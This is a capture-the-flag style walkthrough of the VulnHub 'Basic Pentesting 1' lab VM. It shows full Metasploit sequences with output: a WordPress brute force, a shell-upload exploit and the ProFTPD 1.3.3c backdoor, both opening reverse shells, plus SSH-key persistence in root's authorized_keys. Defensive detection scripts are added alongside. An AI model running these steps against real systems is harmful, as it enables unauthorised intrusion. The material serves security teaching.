Basic pentesting 1 (Sagar Rahalkar Book)
Review of what I learned from the book 'Quick Start Guide to Penetration Testing' by Sagar Rahalkar
Continuation of the '#Pentesting4ever' workshop given at the #Euskalhack computer security conference.
Notes passed on by a fellow attendee of the conference. Many thanks ;)
Book here: https://b-ok.org/book/3632506/105161
1) I download the machine from https://www.vulnhub.com/entry/basic-pentesting-1,216/
2) I import the machine into VirtualBox.
Note: if the machine does not import cleanly, rename the .ova to .ova.tar, extract the hard disk csec-disk001.vmdk, create a new virtual machine of type Linux / Ubuntu 64-bit and attach the extracted disk to it.
3) I start the machine to be audited, basic_pentesting_1.ova, in VirtualBox.
Note 2: I configure its network as a host-only adapter.
The network of my VMs is 192.168.56.XX (this may differ on your machine; check with ip a | grep global).
Then I run nmap -sn 192.168.56.0/24 (or nmap -sn 192.168.56.*) to see what turns up:
#### Enumeration
Good. The IP is 192.168.56.101.
Second, more precise scan: nmap -sC -A 192.168.56.101
```
em50l@jejo.es$ nmap -sC -A 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-13 13:30 CEST
Nmap scan report for 192.168.56.101
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
em50l@jejo.es$
```
- 21 ftp ProFTPD 1.3.3c
- 22 ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
- 80 http Apache httpd 2.4.18 ((Ubuntu))
The page http://192.168.56.101 doesn't say much…
```
msf5 > curl -v http://192.168.56.101
[*] exec: curl -v http://192.168.56.101

< HTTP/1.1 200 OK
< Date: Sat, 13 Jul 2019 11:43:02 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Thu, 16 Nov 2017 16:53:57 GMT
< Content-Type: text/html
<
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>
```
I try to enumerate HTTP paths:
```
msf5 > nmap 192.168.56.101 -p 80 --script http-enum
[*] exec: nmap 192.168.56.101 -p 80 --script http-enum

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 07:48 EDT
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|_  /secret/: Potentially interesting folder
```
I see a subdirectory called secret.
I visit the page http://192.168.56.101/secret/
```
msf5 > curl http://192.168.56.101/secret/ |grep "<title>"
[*] exec: curl http://192.168.56.101/secret/ |grep "<title>"

<title>My secret blog – Just another WordPress site</title>
```
It's a WordPress blog.
A dictionary attack????
I'm going to use the following wordlists that ship with Kali:
```
cat /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
cat /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt
cat /usr/share/wordlists/metasploit/default_userpass_for_services_unhash.txt
```
```
msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          80               yes       The target port (TCP)
   TARGETURI      /                yes       The base path to the wordpress application
   USERNAME                        no        A specific username to authenticate as
   USER_FILE                       no        File containing usernames, one per line
   PASSWORD                        no        A specific password to authenticate with
   PASS_FILE                       no        File containing passwords, one per line
   USERPASS_FILE                   no        File containing users and passwords separated by space, one pair per line

msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/
targeturi => /secret/
msf5 auxiliary(scanner/http/wordpress_login_enum) > set userpass_file /usr/share/wordlists/metasploit/default_userpass_for_services_unhash.txt
userpass_file => /usr/share/wordlists/metasploit/default_userpass_for_services_unhash.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set verbose no
verbose => false
msf5 auxiliary(scanner/http/wordpress_login_enum) > run

[*] /secret/ - WordPress Version 4.9 detected
[*] /secret/ - WordPress User-Validation - Checking Username:'admin'
[+] /secret/ - WordPress User-Validation - Username: 'admin' - is VALID
[*] /secret/ - WordPress User-Validation - Checking Username:''
[*] /secret/ - WordPress User-Validation - Checking Username:'root'
[*] /secret/ - WordPress User-Validation - Checking Username:'Administrator'
[*] /secret/ - WordPress User-Validation - Checking Username:'sysadm'
[*] /secret/ - WordPress User-Validation - Checking Username:'tech'
...
...
...
[+] /secret/ - WordPress User-Validation - Found 3 valid users
[+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin'
[+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'ADMIN' : 'admin'
[+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'Admin' : 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
I see that the account admin / admin works.
If we already knew the username, we would only need to run through the passwords:
```
msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/metasploit/default_pass_for_services_unhash.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > run

[*] /secret/ - WordPress Version 4.9 detected
[*] /secret/ - WordPress User-Validation - Checking Username:'admin'
[+] /secret/ - WordPress User-Validation - Username: 'admin' - is VALID
[+] /secret/ - WordPress User-Validation - Found 1 valid user
[+] /secret/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
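Seen from the server side, the user validation and brute force above leave a very visible trail in the web server log: a burst of POST requests to wp-login.php from one client. The script below is an added example (not from the writeup or from the book) that finds such bursts in Apache combined-format log lines. The log lines are constructed for the example; the script assumes the usual WordPress behaviour that a failed login re-renders the form with HTTP 200 while a successful one redirects with 302, and the threshold and window are arbitrary starting points to tune against your own traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format log lines (not taken from the writeup).
# 192.168.56.102 hits wp-login.php six times in ten seconds, the last attempt
# succeeding (302); 192.168.56.1 is a single legitimate login.
SAMPLE_LOG = """\
192.168.56.102 - - [13/Jul/2019:13:50:00 +0200] "GET /secret/ HTTP/1.1" 200 5123 "-" "curl/7.64.0"
192.168.56.102 - - [13/Jul/2019:13:50:01 +0200] "POST /secret/wp-login.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
192.168.56.102 - - [13/Jul/2019:13:50:02 +0200] "POST /secret/wp-login.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
192.168.56.1 - - [13/Jul/2019:13:50:03 +0200] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.102 - - [13/Jul/2019:13:50:04 +0200] "POST /secret/wp-login.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
192.168.56.102 - - [13/Jul/2019:13:50:06 +0200] "POST /secret/wp-login.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
192.168.56.102 - - [13/Jul/2019:13:50:08 +0200] "POST /secret/wp-login.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
192.168.56.102 - - [13/Jul/2019:13:50:10 +0200] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD path protocol", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop any query string
        "status": int(m["status"]),
    }


def find_login_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: (login_posts, successes)} for every client that POSTs to
    wp-login.php at least `threshold` times inside any span of length `window`.
    A success is a 302 response (WordPress redirects after a valid login)."""
    posts = defaultdict(list)            # ip -> [(timestamp, status), ...]
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"].endswith("/wp-login.php"):
            posts[ev["ip"]].append((ev["ts"], ev["status"]))

    flagged = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                successes = sum(1 for _, status in events if status == 302)
                flagged[ip] = (len(events), successes)
                break
    return flagged


if __name__ == "__main__":
    for ip, (attempts, successes) in find_login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {attempts} login attempts, {successes} succeeded")
```

A client that crosses the threshold and then gets a 302 is the case worth paging on: the password was found. Feeding the same rule into fail2ban or a WAF, and enabling lockout or MFA on wp-login.php, removes the condition that made admin:admin work.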
#### Exploitation
My first meterpreter… :)
```
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret/
targeturi => /secret/
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/rABMkLWiXs/VZxdEQbHZV.php...
[*] Sending stage (38247 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:56150) at 2019-07-13 08:09:26 -0400
[+] Deleted VZxdEQbHZV.php
[+] Deleted rABMkLWiXs.php
[+] Deleted ../rABMkLWiXs

meterpreter >
meterpreter > sysinfo
Computer    : vtcsec
OS          : Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter >
```
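The module above gets code execution by installing a plugin with a random name under wp-content/plugins/ and, as the output shows, removes it afterwards. What a site owner can do against this is keep a hash baseline of the plugins directory and diff it on a schedule. The following is an added example, not part of the writeup or the book: it hashes every file under a plugins directory, compares two snapshots and reports PHP files that appeared or changed. The directory tree it builds lives in a temporary folder with placeholder contents; on a real site the baseline is taken right after a known-good install or update and stored off the web server. Because the module cleans up after itself, a periodic snapshot only catches what persists, so this belongs next to web-server log monitoring rather than in place of it.

```python
import hashlib
import os
import tempfile


def snapshot(plugins_dir):
    """Map every file under plugins_dir (path relative to it) to its SHA-256 hex digest."""
    snap = {}
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            snap[os.path.relpath(full, plugins_dir)] = digest
    return snap


def diff_snapshots(baseline, current):
    """Compare two snapshots and list what appeared, disappeared or changed."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
    }


def suspicious_php(diff):
    """PHP files that appeared or changed outside a planned plugin update."""
    return sorted(p for p in diff["added"] + diff["modified"] if p.endswith(".php"))


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def demo():
    """Constructed scenario: baseline a plugins tree, then simulate an uploaded rogue plugin."""
    with tempfile.TemporaryDirectory() as plugins:
        # Known-good state: one legitimate plugin (placeholder contents)
        _write(os.path.join(plugins, "akismet", "akismet.php"),
               "<?php\n/*\nPlugin Name: Akismet Anti-Spam\n*/\n")
        _write(os.path.join(plugins, "akismet", "readme.txt"), "placeholder readme\n")
        baseline = snapshot(plugins)

        # Later: a random-named plugin directory with a PHP file shows up and a
        # legitimate file is altered (placeholder contents, not a real payload)
        _write(os.path.join(plugins, "rAnDoMnAmE", "dropper.php"),
               "<?php /* constructed placeholder */\n")
        _write(os.path.join(plugins, "akismet", "akismet.php"),
               "<?php\n/*\nPlugin Name: Akismet Anti-Spam\n*/\n/* extra line */\n")

        return suspicious_php(diff_snapshots(baseline, snapshot(plugins)))


if __name__ == "__main__":
    print(demo())   # ['akismet/akismet.php', 'rAnDoMnAmE/dropper.php']
```

The same snapshot/diff pair works for wp-content/uploads and themes, which are the other places a plugin-upload primitive tends to land files. Removing the ability of the admin account to upload plugins at all (DISALLOW_FILE_MODS in wp-config.php) closes the path this module uses.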
My second Meterpreter
```
msf5 > search ProFTPD 1.3.3c

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   5  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.56.101
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.56.102:4444
[*] 192.168.56.101:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Es58meReLTodWnUc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Es58meReLTodWnUc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.56.102:4444 -> 192.168.56.101:56164) at 2019-07-13 13:22:04 -0400

uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
pwd
/
```
#### Enumeration: gathering information
From meterpreter I run a post-exploitation module:
```
meterpreter > run post/linux/gather/enum_configs

[*] Running module against 192.168.56.101 [sh: 0: getcwd() failed: No such file or directory
vtcsec]
[*] Info:
[*]     Ubuntu 16.04.3 LTS
[*]     sh: 0: getcwd() failed: No such file or directory
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[+] apache2.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_830881.txt
[+] ports.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_621936.txt
[+] my.cnf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_202572.txt
[+] ufw.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_954492.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190718174318_default_192.168.56.101_linux.enum.conf_281226.txt
```
#### Privilege escalation
Enumeration:
- Users: `ls /home` shows one user, marlinspike
- Operating system: `cat /etc/*-release` gives Ubuntu 16.04.3 LTS (Xenial Xerus)
- Architecture: `uname -m` => x86_64
- Services: `netstat -ano`
Note: the shell drops. I try with `set payload cmd/unix/reverse`.
#### SSH shell access
I create an SSH key with `ssh-keygen -t rsa -b 1024` and call it id_pt (for pentesting).
From the shell on the remote machine I append the public key to a user:
```
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1V1D828tZFRmhrLSH38zFGW6a6zAMCUr8vyUke7fxhdijtGenlHcI7iFv80fGZ/u/S03RyzpBmfMaJ9SJreZJ3znPT9YnkOaxVew4CssMfR2W0PyqOYd+6abMyd6LisatgbKA/zFgIzT2dzhK60081OplwOMvfoGsKRPlQ40HNw== " >> /home/marlinspike/.ssh/authorized_keys
## maybe we get lucky as root
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1V1D828tZFRmhrLSH38zFGW6a6zAMCUr8vyUke7fxhdijtGenlHcI7iFv80fGZ/u/S03RyzpBmfMaJ9SJreZJ3znPT9YnkOaxVew4CssMfR2W0PyqOYd+6abMyd6LisatgbKA/zFgIzT2dzhK60081OplwOMvfoGsKRPlQ40HNw== " >> /root/.ssh/authorized_keys
```
and…
```
jejo@medion:~$ ssh marlinspike@192.168.56.101 -i id_pt
debug1: Authentication succeeded (publickey).
Authenticated to 192.168.56.101 ([192.168.56.101]:22).
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

19 packages can be updated.
19 updates are security updates.

Last login: Sat Jul 13 15:24:03 2019 from 192.168.56.1
marlinspike@vtcsec:~$
```
Ta-da, shell access….
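Appending a key to authorized_keys, as done above for marlinspike and root, is also the classic persistence trick, so auditing those files is worth a script on the blue side. This is an added example, not from the writeup or the book: it parses each authorized_keys line, computes the OpenSSH SHA256 fingerprint, flags any key that is not in an inventory of expected keys, and also flags RSA keys shorter than 2048 bits (the key above was generated with -b 1024). The inventory, the root key and the file contents are constructed for the example; the marlinspike key is the one from the writeup, and the script reads the wire-format blob to report its 1024-bit modulus.

```python
import base64
import hashlib
import struct

# Public key from the writeup (generated there with ssh-keygen -t rsa -b 1024).
WRITEUP_KEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1V1D828tZFRmhrLSH38zFGW6a6zAMCUr8vyUke7fxhdijtGenlHcI7iFv80fGZ/u/S03RyzpBmfMaJ9SJreZJ3znPT9YnkOaxVew4CssMfR2W0PyqOYd+6abMyd6LisatgbKA/zFgIzT2dzhK60081OplwOMvfoGsKRPlQ40HNw=="


def ssh_blob_fields(b64):
    """Split a base64 OpenSSH key blob into its length-prefixed wire-format fields."""
    raw = base64.b64decode(b64)
    fields, off = [], 0
    while off < len(raw):
        (n,) = struct.unpack(">I", raw[off:off + 4])
        off += 4
        fields.append(raw[off:off + n])
        off += n
    return fields


def make_rsa_blob(e, n):
    """Build an ssh-rsa blob from integers; used here only to construct sample keys."""
    def mpint(x):
        b = x.to_bytes((x.bit_length() + 8) // 8, "big")   # extra zero byte keeps it positive
        return struct.pack(">I", len(b)) + b
    body = struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)
    return base64.b64encode(body).decode()


def rsa_bits(b64):
    """Modulus size in bits for ssh-rsa blobs, None for other key types."""
    fields = ssh_blob_fields(b64)
    if fields[0] != b"ssh-rsa":
        return None
    return int.from_bytes(fields[2], "big").bit_length()   # fields: type, e, n


def fingerprint(b64):
    """OpenSSH-style SHA256 fingerprint, the form ssh-keygen -lf prints."""
    digest = hashlib.sha256(base64.b64decode(b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(files, inventory, min_rsa_bits=2048):
    """files: {path: contents of that authorized_keys file}; inventory: set of
    expected fingerprints. Returns (path, line_no, reason, fingerprint) findings."""
    findings = []
    for path, text in files.items():
        for no, line in enumerate(text.splitlines(), 1):
            parts = line.split()
            if not parts or parts[0].startswith("#"):
                continue
            # the key type may be preceded by an options field (command=..., from=...);
            # options with spaces inside quotes are not handled by this simple split
            idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-"))), None)
            if idx is None or idx + 1 >= len(parts):
                findings.append((path, no, "unparseable line", None))
                continue
            blob = parts[idx + 1]
            try:
                fp = fingerprint(blob)
                bits = rsa_bits(blob)
            except (ValueError, struct.error, IndexError):
                findings.append((path, no, "malformed key blob", None))
                continue
            if fp not in inventory:
                findings.append((path, no, "key not in inventory", fp))
            if bits is not None and bits < min_rsa_bits:
                findings.append((path, no, f"weak RSA key ({bits} bits)", fp))
    return findings


# Constructed sample: an approved 2048-bit ops key on root, the writeup's key on marlinspike.
OPS_BLOB = make_rsa_blob(65537, (1 << 2047) | 0x10001)   # placeholder modulus, not a real key
SAMPLE_FILES = {
    "/root/.ssh/authorized_keys": "ssh-rsa " + OPS_BLOB + " ops@example\n",
    "/home/marlinspike/.ssh/authorized_keys": "# keys\n" + WRITEUP_KEY + "\n",
}
INVENTORY = {fingerprint(OPS_BLOB)}

if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE_FILES, INVENTORY):
        print(finding)
```

To run this against real hosts, build `files` by reading /root/.ssh/authorized_keys and every /home/*/.ssh/authorized_keys (plus any AuthorizedKeysFile paths set in sshd_config) and feed the fingerprints from your key inventory as `inventory`; a line that is not in the inventory is exactly the artefact the two echo commands above leave behind.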
#### Fixing the WordPress URL problem
1) In /etc/hosts, add an entry that points to http://vtcsec.
2) Edit the WordPress configuration:
nano /var/www/html/secret/wp-config.php
and add at the beginning:
```php
<?php
// wp-config.php already opens with <?php: paste only the two define() lines
// right after that opening tag rather than adding a second one.
define('WP_HOME','/secret/');
define('WP_SITEURL','/secret/');
```